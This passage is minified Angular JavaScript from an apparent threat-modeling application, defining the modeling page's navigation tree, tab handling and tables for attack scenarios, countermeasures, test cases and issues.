e=B(2).$implicit,i=B();V("selectedNode",i.selectedNode)("diagram",e.nav.data)("selectedElement",i.selectedObject)}}function gSe(t,a){if(1&t){const e=Ye();m(0,"app-stack",44,45),he("selectionChanged",function(n){return be(e),Me(B(3).selectedObject=n)}),u()}if(2&t){const e=B(2).$implicit,i=B();V("stack",e.nav.data)("selectedComponent",i.selectedComponent)}}function CSe(t,a){1&t&&it(0,"app-checklist",46),2&t&&V("checklist",B(2).$implicit.nav.data)}function ySe(t,a){1&t&&it(0,"app-testing",47),2&t&&V("testing",B(2).$implicit.nav.data)}function bSe(t,a){if(1&t&&(s(0,"\n                    "),ne(1,dSe,1,0,"app-model-info",27),s(2,"\n                    "),ne(3,mSe,1,1,"app-char-scope",28),s(4,"\n                    "),ne(5,uSe,1,1,"app-obj-impact",29),s(6,"\n                    "),ne(7,hSe,1,1,"app-threat-sources",30),s(8,"\n                    "),ne(9,fSe,1,0,"app-threat-identification",31),s(10,"\n                    "),ne(11,pSe,1,2,"app-device-assets",32),s(12,"\n                    "),ne(13,_Se,1,3,"app-diagram",33),s(14,"\n                    "),ne(15,gSe,2,2,"app-stack",34),s(16,"\n                    "),ne(17,CSe,1,1,"app-checklist",35),s(18,"\n                    "),ne(19,ySe,1,1,"app-testing",36),s(20,"\n                  ")),2&t){const e=B().$implicit,i=B();C(1),V("ngIf",i.IsModelInfo(e.nav)),C(2),V("ngIf",i.IsCharScope(e.nav)),C(2),V("ngIf",i.IsObjImpact(e.nav)),C(2),V("ngIf",i.IsThreatSource(e.nav)),C(2),V("ngIf",i.IsThreatIdentification(e.nav)),C(2),V("ngIf",i.IsAssetGroup(e.nav)),C(2),V("ngIf",i.IsDiagram(e.nav)),C(2),V("ngIf",i.IsMyComponentStack(e.nav)),C(2),V("ngIf",i.IsChecklist(e.nav)),C(2),V("ngIf",i.IsTesting(e.nav))}}function MSe(t,a){1&t&&(m(0,"mat-tab",18),s(1,"\n                  "),ne(2,lSe,25,8,"ng-template",19),s(3,"\n                  "),ne(4,bSe,21,10,"ng-template",20),s(5,"\n                "),u())}function vSe(t,a){if(1&t&&(s(0,"\n                    "),m(1,"span",53),s(2),oe(3,"translate"),u(),s(4,"\n                  ")),2&t){const e=B(2);C(1),V("matBadge",e.currentThreatCount)("matBadgeHidden",0==e.currentThreatCount),C(1),ke(re(3,3,"general.AttackScenarios"))}}function ASe(t,a){if(1&t&&(s(0,"\n                    "),m(1,"span",53),s(2),oe(3,"translate"),u(),s(4,"\n                  ")),2&t){const e=B(2);C(1),V("matBadge",e.currentCountermeasureCount)("matBadgeHidden",0==e.currentCountermeasureCount),C(1),ke(re(3,3,"general.Countermeasures"))}}function TSe(t,a){if(1&t&&(s(0,"\n                    "),m(1,"span",53),s(2),oe(3,"translate"),u(),s(4,"\n                  ")),2&t){const e=B(3);C(1),V("matBadge",e.currentTestCaseCount)("matBadgeHidden",0==e.currentTestCaseCount),C(1),ke(re(3,3,"general.TestCases"))}}function ESe(t,a){if(1&t){const e=Ye();m(0,"mat-tab"),s(1,"\n                  "),ne(2,TSe,5,5,"ng-template",49),s(3,"\n                  "),m(4,"app-test-case-table",54),he("selectedObjectChanged",function(n){return be(e),Me(B(2).selectedObject=n)})("testCaseCountChanged",function(n){return be(e),Me(B(2).currentTestCaseCount=n)}),u(),s(5,"\n                "),u()}if(2&t){const e=B(2);C(4),V("isActive",2==e.selectedBottomTabGroupIndex)("selectedNode",e.selectedNode)("selectedObject",e.selectedObject)("filteredObject",e.filteredObject)}}function DSe(t,a){if(1&t&&(s(0,"\n                    "),m(1,"span",53),s(2),oe(3,"translate"),u(),s(4,"\n                  ")),2&t){const e=B(2);C(1),V("matBadge",e.currentIssueCount)("matBadgeHidden",0==e.currentIssueCount),C(1),ke(re(3,3,"general.Issues"))}}function xSe(t,a){if(1&t){const e=Ye();m(0,"as-split-area",7),s(1,"\n              "),m(2,"mat-tab-group",48),he("selectedIndexChange",function(n){return be(e),Me(B().selectedBottomTabGroupIndex=n)}),s(3,"\n                "),m(4,"mat-tab"),s(5,"\n                  "),ne(6,vSe,5,5,"ng-template",49),s(7,"\n                  "),m(8,"app-threat-table",50),he("selectedObjectChanged",function(n){return be(e),Me(B().selectedObject=n)})("threatCountChanged",function(n){return be(e),Me(B().currentThreatCount=n)}),u(),s(9,"\n                "),u(),s(10,"\n                "),m(11,"mat-tab"),s(12,"\n                  "),ne(13,ASe,5,5,"ng-template",49),s(14,"\n                  "),m(15,"app-countermeasure-table",51),he("selectedObjectChanged",function(n){return be(e),Me(B().selectedObject=n)})("countermeasureCountChanged",function(n){return be(e),Me(B().currentCountermeasureCount=n)}),u(),s(16,"\n                "),u(),s(17,"\n                "),ne(18,ESe,6,4,"mat-tab",10),s(19,"\n                "),m(20,"mat-tab"),s(21,"\n                  "),ne(22,DSe,5,5,"ng-template",49),s(23,"\n                  "),m(24,"app-issue-table",52),he("selectedObjectChanged",function(n){return be(e),Me(B().selectedObject=n)})("issueCountChanged",function(n){return be(e),Me(B().currentIssueCount=n)}),u(),s(25,"\n                "),u(),s(26,"\n              "),u(),s(27,"\n            "),u()}if(2&t){const e=B();V("size",e.GetSplitSize(2,1,30))("order",2),C(8),V("isActive",0==e.selectedBottomTabGroupIndex)("selectedNode",e.selectedNode)("selectedObject",e.selectedObject)("filteredObject",e.filteredObject),C(7),V("isActive",1==e.selectedBottomTabGroupIndex)("selectedNode",e.selectedNode)("selectedObject",e.selectedObject)("filteredObject",e.filteredObject),C(3),V("ngIf",e.dataService.Project.HasTesting),C(6),V("isActive",3==e.selectedBottomTabGroupIndex)("selectedNode",e.selectedNode)("selectedObject",e.selectedObject)("filteredObject",e.filteredObject)}}var aa=(()=>{return(t=aa||(aa={})).CharScope="char-scope",t.ObjImpact="obj-impact",t.Context="context",t.UseCase="use-case",t.Assets="asset",t.ThreatSources="threat-sources",t.SystemThreats="system-threats",t.Hardware="hardware",t.Software="software",t.Process="process",t.Dataflow="dataflow",t.Checklist="checklist",aa;var t})();let zG=(()=>{class t extends CT{constructor(e,i,n,r,c,d,T){super(),this.theme=e,this.dataService=i,this.router=n,this.route=r,this.locStorage=c,this.dialog=d,this.translate=T,this._selectedTabIndex=0,this.tabs=[],this.hasBottomTabGroup=!0,this.selectedBottomTabGroupIndex=0,this.currentThreatCount=0,this.currentCountermeasureCount=0,this.currentTestCaseCount=0,this.currentIssueCount=0,this.dataService.Project||this.router.navigate(["/"]),this.router.events.subscribe(k=>{k instanceof Ph&&this.route.queryParams.subscribe(q=>{const Y=pe=>{const Re=xa.FlattenNodes(this.nodes).find(Fe=>Fe.dataType==pe);Re&&this.newTab(Re),this.router.navigate([],{replaceUrl:!0,relativeTo:this.route})},te=pe=>{const Re=xa.FlattenNodes(this.nodes).find(Fe=>{var Ne;return(null===(Ne=Fe.data)||void 0===Ne?void 0:Ne.ID)==pe});Re&&this.newTab(Re),this.router.navigate([],{replaceUrl:!0,relativeTo:this.route})};if(null!=q.tab&&(this.nodes?Y(q.tab):setTimeout(()=>{this.nodes&&Y(q.tab)},500)),null!=q.viewID&&(this.nodes?te(q.viewID):setTimeout(()=>{this.nodes&&te(q.viewID)},500)),null!=q.elementID){let pe=this.dataService.Project.GetDFDElement(q.elementID);pe||(pe=this.dataService.Project.GetComponent(q.elementID)),pe||(pe=this.dataService.Project.GetContextElement(q.elementID)),pe&&setTimeout(()=>{this.selectedObject=pe},100)}})}),this.dataService.ProjectChanged.subscribe(k=>{k&&setTimeout(()=>{this.tabs.forEach(q=>this.RemoveTab(q)),this.createNodes()},10)})}get selectedNode(){var e;return(this.selectedTabIndex<0&&this.tabs.length>0||this.selectedTabIndex>=this.tabs.length&&this.tabs.length>0)&&(console.error("Tab index out of array"),console.log(this.selectedTabIndex,this.tabs.length)),null===(e=this.tabs[this.selectedTabIndex])||void 0===e?void 0:e.nav}set selectedNode(e){setTimeout(()=>{this.hasBottomTabGroup=!e||[aa.Context,aa.UseCase,aa.Hardware,aa.Software,aa.Process,aa.Dataflow].includes(e.dataType),e&&this.newTab(e)},10)}get selectedTabIndex(){return this._selectedTabIndex<0&&this.tabs.length>0&&(this._selectedTabIndex=0),this._selectedTabIndex}set selectedTabIndex(e){this._selectedTabIndex=e,setTimeout(()=>{this.elementView&&this.elementView.RefreshTree()},100)}get selectedObject(){return this._selectedObject}set selectedObject(e){this._selectedObject=e}get filteredObject(){return this._filteredObject}set filteredObject(e){this._filteredObject=e}get selectedComponent(){return this.selectedObject instanceof rf?this.selectedObject:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}RemoveTab(e){const i=this.tabs.indexOf(e);if(i>-1){let n=this.tabs.indexOf(e)==this.selectedTabIndex;this.tabs.splice(i,1),n?this.OnTabIndexChange(i>0?i-1:0):i<this.selectedTabIndex&&(this.selectedTabIndex=this.selectedTabIndex-1)}}OnTabIndexChange(e){if(e==this.selectedTabIndex)return;let i=this.selectedTabIndex;this.selectedTabIndex=e,this.selectedObject=null,this.filteredObject=null,this.tabs.length>i&&this.tabs[i]&&!this.tabs[i].keepOpen&&setTimeout(()=>{this.RemoveTab(this.tabs[i]),i<this.selectedTabIndex&&(this.selectedTabIndex=this.selectedTabIndex-1)},500)}OnNodeDoubleClicked(e){let i=this.tabs.find(n=>n.nav==e);i&&(i.keepOpen=!0)}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_MODELING_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_MODELING_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes))}OnOpenDiagram(e){let i=xa.FindNodeOfObject(e.diagram,this.nodes);i||(this.createNodes(),i=xa.FindNodeOfObject(e.diagram,this.nodes)),i&&this.newTab(i),e.element&&setTimeout(()=>{this.selectedObject=e.element},1e3)}IsCharScope(e){return(null==e?void 0:e.data)instanceof dM}IsObjImpact(e){return(null==e?void 0:e.data)instanceof mM}IsThreatSource(e){return(null==e?void 0:e.data)instanceof uM}IsThreatIdentification(e){return(null==e?void 0:e.dataType)==aa.SystemThreats}IsAssetGroup(e){return(null==e?void 0:e.data)instanceof Zl}IsDiagram(e){return(null==e?void 0:e.data)instanceof ns}IsMyComponentStack(e){return(null==e?void 0:e.data)instanceof Om}IsChecklist(e){return(null==e?void 0:e.data)instanceof CM}IsModelInfo(e){return(null==e?void 0:e.data)instanceof mf}IsTesting(e){return(null==e?void 0:e.data)instanceof fM}GetContainer(e){var i;if(e){if(this.isContainer(e.data))return e.data;if(this.isContainer(null===(i=e.data)||void 0===i?void 0:i.Elements))return e.data.Elements}}IsContainer(e){return null!=this.GetContainer(e)}isContainer(e){return e&&e.GetChildren&&"function"==typeof e.GetChildren}newTab(e){var i;let n=this.tabs.find(r=>{var c,d;return(null===(c=r.nav.data)||void 0===c?void 0:c.ID)==(null===(d=e.data)||void 0===d?void 0:d.ID)});if(n)this.OnTabIndexChange(this.tabs.indexOf(n));else{let r=null===(i=this.findParent(e,this.nodes))||void 0===i?void 0:i.name();r||(r=this.dataService.Project.Name),this.tabs.push({label:r,keepOpen:!1,nav:e}),setTimeout(()=>{this.OnTabIndexChange(this.tabs.length-1)},100)}}findParent(e,i){for(let n=0;n<i.length;n++)if(i[n].children&&i[n].children.includes(e))return i[n];for(let n=0;n<i.length;n++)if(i[n].children){let r=this.findParent(e,i[n].children);if(r)return r}return null}createNodes(){var e,i,n;const r=null===(e=this.selectedNode)||void 0===e?void 0:e.data,c=this.nodes;this.nodes=[];const d=this.dataService.Project,T=Ze=>{let yt={name:()=>Ze.Name,icon:"fact_check",iconAlignLeft:!0,canSelect:!0,data:Ze,dataType:aa.Checklist,canRename:!0,onRename:It=>{Ze.Name=It},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Ze).subscribe(It=>{if(It){this.dataService.Project.DeleteChecklist(Ze),this.selectedNode==yt&&(this.selectedNode=null);let St=this.tabs.find(Nt=>Nt.nav.data.ID==Ze.ID);St&&this.RemoveTab(St),this.createNodes()}})}};return yt},k=(Ze,yt)=>{let It={name:()=>Ze.Name,canSelect:!1,data:Ze,canRename:!0,onRename:Nt=>{Ze.Name=Nt},canAdd:!0,addOptions:[],onAdd:Nt=>{if("Assets"==Nt){let oi=d.InitializeNewAssetGroup(d.Config);Ze.Data.assetGroupID=oi.ID,this.createNodes(),this.selectedNode=xa.FindNodeOfObject(oi,this.nodes)}else if("Software"==Nt){let oi=Ze.CreateSoftwareStack();this.createNodes(),this.selectedNode=xa.FindNodeOfObject(oi,this.nodes)}else if("Process"==Nt){let oi=Ze.CreateProcessStack();this.createNodes(),this.selectedNode=xa.FindNodeOfObject(oi,this.nodes)}else{let oi=this.dataService.Config.GetChecklistTypes().find(Ai=>Ai.Name==Nt.replace(this.translate.instant("general.Checklist")+": ",""));if(oi){let Ai=this.dataService.Project.CreateChecklist(Ze,oi);this.createNodes();const vi=xa.FindNodeOfObject(Ai,this.nodes);this.selectedNode=vi,vi.isRenaming=!0}}},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Ze).subscribe(Nt=>{if(Nt){this.dataService.Project.DeleteContextElement(Ze),this.selectedNode==It&&(this.selectedNode=null);let oi=this.tabs.find(Ai=>{var vi;return(null===(vi=Ai.nav.data)||void 0===vi?void 0:vi.ID)==Ze.ID});oi&&this.RemoveTab(oi),this.createNodes()}})},canDuplicate:!1,canMoveUpDown:!0,onMoveUp:()=>{let Nt=this.dataService.Project.GetContextElements(),oi=yt.children.map(vi=>vi.data),Ai=oi.findIndex(vi=>vi.ID==Ze.ID);if(0!=Ai){let vi=Nt.findIndex(xi=>xi.ID==oi[Ai-1].ID);this.dataService.Project.MoveItemInContextElements(Nt.findIndex(xi=>xi.ID==Ze.ID),vi),yt.children.splice(Ai,0,yt.children.splice(Ai-1,1)[0])}},onMoveDown:()=>{let Nt=this.dataService.Project.GetContextElements(),oi=yt.children.map(vi=>vi.data),Ai=oi.findIndex(vi=>vi.ID==Ze.ID);if(Ai!=oi.length-1){let vi=Nt.findIndex(xi=>xi.ID==oi[Ai+1].ID);this.dataService.Project.MoveItemInContextElements(Nt.findIndex(xi=>xi.ID==Ze.ID),vi),yt.children.splice(Ai,0,yt.children.splice(Ai+1,1)[0])}},children:[]};return Ze.AssetGroup?It.children.push({name:()=>"Assets",icon:Zl.Icon,iconAlignLeft:!0,canSelect:!0,data:Ze.AssetGroup,dataType:aa.Assets,canDelete:!0,onDelete:()=>{let oi=Ze.AssetGroup;this.dialog.OpenDeleteObjectDialog(oi).subscribe(Ai=>{if(Ai){let vi=xa.FindNodeOfObject(oi,this.nodes);this.dataService.Project.DeleteAssetGroup(oi),this.selectedNode==vi&&(this.selectedNode=null);let xi=this.tabs.find(Za=>Za.nav.data.ID==oi.ID);xi&&this.RemoveTab(xi),this.createNodes()}})}}):It.addOptions.push("Assets"),It.children.push({name:()=>"Hardware",icon:"developer_board",iconAlignLeft:!0,canSelect:!0,data:Ze.HardwareDiagram,dataType:aa.Hardware,canRename:!1,canDelete:!1,canDuplicate:!1}),Ze.SoftwareStack?It.children.push({name:()=>"Software",icon:"code",iconAlignLeft:!0,canSelect:!0,data:Ze.SoftwareStack,dataType:aa.Software,canRename:!1,canDelete:!0,onDelete:()=>{let oi=Ze.SoftwareStack;this.dialog.OpenDeleteObjectDialog(oi).subscribe(Ai=>{if(Ai){let vi=xa.FindNodeOfObject(oi,this.nodes);Ze.DeleteSoftwareStack(),this.selectedNode==vi&&(this.selectedNode=null);let xi=this.tabs.find(Za=>Za.nav.data.ID==oi.ID);xi&&this.RemoveTab(xi),this.createNodes()}})}}):It.addOptions.push("Software"),Ze.ProcessStack?It.children.push({name:()=>"Process",icon:"policy",iconAlignLeft:!0,canSelect:!0,data:Ze.ProcessStack,dataType:aa.Process,canRename:!1,canDelete:!0,onDelete:()=>{let oi=Ze.ProcessStack;this.dialog.OpenDeleteObjectDialog(oi).subscribe(Ai=>{if(Ai){let vi=xa.FindNodeOfObject(oi,this.nodes);Ze.DeleteProcessStack(),this.selectedNode==vi&&(this.selectedNode=null);let xi=this.tabs.find(Za=>Za.nav.data.ID==oi.ID);xi&&this.RemoveTab(xi),this.createNodes()}})}}):It.addOptions.push("Process"),It.addOptions.push(...this.dataService.Config.GetChecklistTypes().map(Nt=>this.translate.instant("general.Checklist")+": "+Nt.Name)),Ze.Checklists.forEach(Nt=>It.children.push(T(Nt))),It},q=(Ze,yt)=>{let It={name:()=>Ze.Name,canSelect:!1,data:Ze,canRename:!0,onRename:St=>{Ze.Name=St},canAdd:!0,addOptions:[],onAdd:St=>{if("Assets"==St){let Nt=d.InitializeNewAssetGroup(d.Config);Ze.Data.assetGroupID=Nt.ID,this.createNodes(),this.selectedNode=xa.FindNodeOfObject(Nt,this.nodes)}else if("Software"==St){let Nt=Ze.CreateSoftwareStack();this.createNodes(),this.selectedNode=xa.FindNodeOfObject(Nt,this.nodes)}else if("Process"==St){let Nt=Ze.CreateProcessStack();this.createNodes(),this.selectedNode=xa.FindNodeOfObject(Nt,this.nodes)}else{let Nt=this.dataService.Config.GetChecklistTypes().find(oi=>oi.Name==St.replace("Checklist: ",""));if(Nt){let oi=this.dataService.Project.CreateChecklist(Ze,Nt);this.createNodes();const Ai=xa.FindNodeOfObject(oi,this.nodes);this.selectedNode=Ai,Ai.isRenaming=!0}}},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Ze).subscribe(St=>{if(St){this.dataService.Project.DeleteContextElement(Ze),this.selectedNode==It&&(this.selectedNode=null);let Nt=this.tabs.find(oi=>{var Ai;return(null===(Ai=oi.nav.data)||void 0===Ai?void 0:Ai.ID)==Ze.ID});Nt&&this.RemoveTab(Nt),this.createNodes()}})},canDuplicate:!1,canMoveUpDown:!0,onMoveUp:()=>{let St=this.dataService.Project.GetContextElements(),Nt=yt.children.map(Ai=>Ai.data),oi=Nt.findIndex(Ai=>Ai.ID==Ze.ID);if(0!=oi){let Ai=St.findIndex(vi=>vi.ID==Nt[oi-1].ID);this.dataService.Project.MoveItemInContextElements(St.findIndex(vi=>vi.ID==Ze.ID),Ai),yt.children.splice(oi,0,yt.children.splice(oi-1,1)[0])}},onMoveDown:()=>{let St=this.dataService.Project.GetContextElements(),Nt=yt.children.map(Ai=>Ai.data),oi=Nt.findIndex(Ai=>Ai.ID==Ze.ID);if(oi!=Nt.length-1){let Ai=St.findIndex(vi=>vi.ID==Nt[oi+1].ID);this.dataService.Project.MoveItemInContextElements(St.findIndex(vi=>vi.ID==Ze.ID),Ai),yt.children.splice(oi,0,yt.children.splice(oi+1,1)[0])}},children:[]};return Ze.AssetGroup?It.children.push({name:()=>"Assets",icon:Zl.Icon,iconAlignLeft:!0,canSelect:!0,data:Ze.AssetGroup,dataType:aa.Assets,canDelete:!0,onDelete:()=>{let Nt=Ze.AssetGroup;this.dialog.OpenDeleteObjectDialog(Nt).subscribe(oi=>{if(oi){let Ai=xa.FindNodeOfObject(Nt,this.nodes);this.dataService.Project.DeleteAssetGroup(Nt),this.selectedNode==Ai&&(this.selectedNode=null);let vi=this.tabs.find(xi=>xi.nav.data.ID==Nt.ID);vi&&this.RemoveTab(vi),this.createNodes()}})}}):It.addOptions.push("Assets"),Ze.SoftwareStack?It.children.push({name:()=>"Software",icon:"code",iconAlignLeft:!0,canSelect:!0,data:Ze.SoftwareStack,dataType:aa.Software,canRename:!1,canDelete:!0,onDelete:()=>{let Nt=Ze.SoftwareStack;this.dialog.OpenDeleteObjectDialog(Nt).subscribe(oi=>{if(oi){let Ai=xa.FindNodeOfObject(Nt,this.nodes);Ze.DeleteSoftwareStack(),this.selectedNode==Ai&&(this.selectedNode=null);let vi=this.tabs.find(xi=>xi.nav.data.ID==Nt.ID);vi&&this.RemoveTab(vi),this.createNodes()}})}}):It.addOptions.push("Software"),Ze.ProcessStack?It.children.push({name:()=>"Process",icon:"policy",iconAlignLeft:!0,canSelect:!0,data:Ze.ProcessStack,dataType:aa.Process,canRename:!1,canDelete:!0,onDelete:()=>{let Nt=Ze.ProcessStack;this.dialog.OpenDeleteObjectDialog(Nt).subscribe(oi=>{if(oi){let Ai=xa.FindNodeOfObject(Nt,this.nodes);Ze.DeleteProcessStack(),this.selectedNode==Ai&&(this.selectedNode=null);let vi=this.tabs.find(xi=>xi.nav.data.ID==Nt.ID);vi&&this.RemoveTab(vi),this.createNodes()}})}}):It.addOptions.push("Process"),It.addOptions.push(...this.dataService.Config.GetChecklistTypes().map(St=>"Checklist: "+St.Name)),Ze.Checklists.forEach(St=>It.children.push(T(St))),It},Y=(Ze,yt)=>{let It={name:()=>Ze.Name,icon:"account_tree",iconAlignLeft:!0,canSelect:!0,data:Ze,dataType:aa.Dataflow,canRename:!0,onRename:St=>{Ze.Name=St},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Ze).subscribe(St=>{if(St){this.dataService.Project.DeleteDiagram(Ze),this.selectedNode==It&&(this.selectedNode=null);let Nt=this.tabs.find(oi=>oi.nav.data.ID==Ze.ID);Nt&&this.RemoveTab(Nt),this.createNodes()}})},canDuplicate:!1,canMoveUpDown:!0,onMoveUp:()=>{let St=this.dataService.Project.GetDiagrams(),Nt=yt.children.map(Ai=>Ai.data),oi=Nt.findIndex(Ai=>Ai.ID==Ze.ID);if(0!=oi){let Ai=St.findIndex(vi=>vi.ID==Nt[oi-1].ID);St.splice(Ai,0,St.splice(St.findIndex(vi=>vi.ID==Ze.ID),1)[0]),yt.children.splice(oi,0,yt.children.splice(oi-1,1)[0])}},onMoveDown:()=>{let St=this.dataService.Project.GetDiagrams(),Nt=yt.children.map(Ai=>Ai.data),oi=Nt.findIndex(Ai=>Ai.ID==Ze.ID);if(oi!=Nt.length-1){let Ai=St.findIndex(vi=>vi.ID==Nt[oi+1].ID);St.splice(Ai,0,St.splice(St.findIndex(vi=>vi.ID==Ze.ID),1)[0]),yt.children.splice(oi,0,yt.children.splice(oi+1,1)[0])}}};return It},te={name:()=>this.translate.instant("dialog.modelinfo.title"),icon:"source",iconAlignLeft:!1,canSelect:!0,data:this.dataService.Project},pe={name:()=>this.translate.instant("pages.modeling.analysis"),icon:"create",iconAlignLeft:!1,canSelect:!1,children:[{name:()=>"Characterization & Scope",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"edit_note",data:d.GetCharScope(),dataType:aa.CharScope},{name:()=>"Business Objectives & Impact",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"outlined_flag",data:d.GetObjImpact(),dataType:aa.ObjImpact},{name:()=>"System Interaction",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"signpost",data:null===(i=d.GetSysContext())||void 0===i?void 0:i.ContextDiagram,dataType:aa.Context},{name:()=>"Use Cases",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"explore",data:null===(n=d.GetSysContext())||void 0===n?void 0:n.UseCaseDiagram,dataType:aa.UseCase},{name:()=>"Assets",nameExtension:"(opt*)",tooltipExtension:this.translate.instant("pages.modeling.optionalAsset"),canSelect:!0,iconAlignLeft:!0,icon:Zl.Icon,data:d.GetProjectAssetGroup(),dataType:aa.Assets,canDelete:!0,onDelete:()=>{let Ze=d.GetProjectAssetGroup();this.dialog.OpenDeleteObjectDialog(Ze).subscribe(yt=>{if(yt){let It=xa.FindNodeOfObject(Ze,this.nodes);this.dataService.Project.DeleteAssetGroup(Ze),this.selectedNode==It&&(this.selectedNode=null);let St=this.tabs.find(Nt=>Nt.nav.data.ID==Ze.ID);St&&this.RemoveTab(St),this.createNodes()}})}},{name:()=>"Threat Sources",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"portrait",data:d.GetThreatSources(),dataType:aa.ThreatSources},{name:()=>"Threat Identification",canSelect:!0,iconAlignLeft:!0,icon:"flash_on",dataType:aa.SystemThreats}]},Re=pe.children.findIndex(Ze=>Ze.dataType==aa.Assets);null==pe.children[Re].data&&(pe.children.splice(Re,1),pe.canAdd=!0,pe.addOptions=["Assets"],pe.onAdd=()=>{let Ze=d.InitializeNewAssetGroup(d.Config);d.Data.projectAssetGroupId=Ze.ID,this.createNodes(),this.selectedNode=xa.FindNodeOfObject(Ze,this.nodes)});const Fe={name:()=>this.translate.instant("pages.modeling.devices"),icon:Ou.Icon,iconAlignLeft:!1,canSelect:!1,canAdd:!0,onAdd:()=>{this.dataService.Project.CreateDevice(),this.createNodes()},children:[]},Ne={name:()=>this.translate.instant("pages.modeling.apps"),icon:cf.Icon,iconAlignLeft:!1,canSelect:!1,isExpanded:!1,canAdd:!0,onAdd:()=>{this.dataService.Project.CreateMobileApp(),this.createNodes()},children:[]},et={name:()=>this.translate.instant("pages.modeling.useCaseDFDs"),icon:"account_tree",iconAlignLeft:!1,canSelect:!1,canAdd:!0,onAdd:()=>{let Ze=this.dataService.Project.CreateDiagram(xn.DataFlow);this.createNodes();const yt=xa.FindNodeOfObject(Ze,this.nodes);this.selectedNode=yt,yt.isRenaming=!0},children:[]},ut={name:()=>this.translate.instant("general.TestCases"),icon:"checklist",iconAlignLeft:!1,canSelect:!0,data:this.dataService.Project.GetTesting()};d.GetDevices().forEach(Ze=>Fe.children.push(k(Ze,Fe))),d.GetMobileApps().forEach(Ze=>Ne.children.push(q(Ze,Ne))),d.GetDFDiagrams().forEach(Ze=>et.children.push(Y(Ze,et))),this.nodes.push(te),this.nodes.push(pe),this.nodes.push(Fe),this.nodes.push(Ne),this.nodes.push(et),ut.data&&this.nodes.push(ut),xa.TransferExpandedState(c,this.nodes),this.navTree&&this.navTree.SetNavTreeData(this.nodes,r)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Oo),Ee(Tl),Ee(_r),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-modeling"]],viewQuery:function(e,i){if(1&e&&(Mi(sSe,5),Mi(gT,5)),2&e){let n;Vt(n=Bt())&&(i.elementView=n.first),Vt(n=Bt())&&(i.compStack=n.first)}},features:[ci],decls:68,vars:57,consts:[[1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/modeling",2,"width","100%","height","100%",3,"sameRoute"],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[3,"size","visible","order"],["direction","vertical",3,"gutterSize","restrictMove","dragEnd"],[3,"size","order"],[3,"activeNode","selectedNodeChanged","nodeDoubleClicked"],["navTree",""],[4,"ngIf"],["preserveContent","",1,"topTabGroup",2,"height","100%",3,"selectedIndex","selectedIndexChange"],["style","width: 100%; height: 100%;","class","tab-content",4,"ngFor","ngForOf"],[3,"size","order",4,"ngIf"],[3,"selectedNode"],[3,"dataObject","selectedObject","selectedObjectChanged","openQuestionnaire"],[3,"elements","selectedElement","filteredElement","selectionChanged","filterChanged"],["elementview",""],[1,"tab-content",2,"width","100%","height","100%"],["mat-tab-label","","style","width: 100%;"],["matTabContent",""],[3,"mouseenter","mouseleave","dblclick"],["rowspan","2",2,"width","24px","vertical-align","middle"],[1,"tab-icon"],[2,"vertical-align","middle"],["mat-icon-button","",3,"click"],[2,"font-size","small"],["style","height: 100%; margin: 10px;",3,"refreshNodes",4,"ngIf"],["style","height: 100%;",3,"charScope",4,"ngIf"],["style","height: 100%;",3,"objImpact",4,"ngIf"],["style","height: 100%;",3,"threatSources",4,"ngIf"],["style","height: 100%;",4,"ngIf"],["style","height: 100%;",3,"assetGroup","selectedObject","selectionChanged",4,"ngIf"],["style","height: 100%;",3,"selectedNode","diagram","selectedElement","selectionChanged","navTreeChanged",4,"ngIf"],["style","height: 100%;",3,"stack","selectedComponent","selectionChanged",4,"ngIf"],["style","height: 100%;",3,"checklist",4,"ngIf"],["style","height: 100%;",3,"testing",4,"ngIf"],[2,"height","100%","margin","10px",3,"refreshNodes"],[2,"height","100%",3,"charScope"],[2,"height","100%",3,"objImpact"],[2,"height","100%",3,"threatSources"],[2,"height","100%"],[2,"height","100%",3,"assetGroup","selectedObject","selectionChanged"],[2,"height","100%",3,"selectedNode","diagram","selectedElement","selectionChanged","navTreeChanged"],[2,"height","100%",3,"stack","selectedComponent","selectionChanged"],["compStack",""],[2,"height","100%",3,"checklist"],[2,"height","100%",3,"testing"],[1,"bottomTabGroup",3,"selectedIndexChange"],["mat-tab-label",""],[3,"isActive","selectedNode","selectedObject","filteredObject","selectedObjectChanged","threatCountChanged"],[3,"isActive","selectedNode","selectedObject","filteredObject","selectedObjectChanged","countermeasureCountChanged"],[3,"isActive","selectedNode","selectedObject","filteredObject","selectedObjectChanged","issueCountChanged"],["matBadgeSize","small","matBadgePosition","below","matBadgeOverlap","false",3,"matBadge","matBadgeHidden"],[3,"isActive","selectedNode","selectedObject","filteredObject","selectedObjectChanged","testCaseCountChanged"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),m(6,"app-side-nav",3),he("sameRoute",function(){return i.OnSameRoute()}),u(),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),m(11,"as-split",4),he("dragEnd",function(r){return i.OnSplitSizeChange(r,1)}),s(12,"\n        "),m(13,"as-split-area",5),s(14,"\n          "),m(15,"as-split",6),he("dragEnd",function(r){return i.OnSplitSizeChange(r,3)}),s(16,"\n            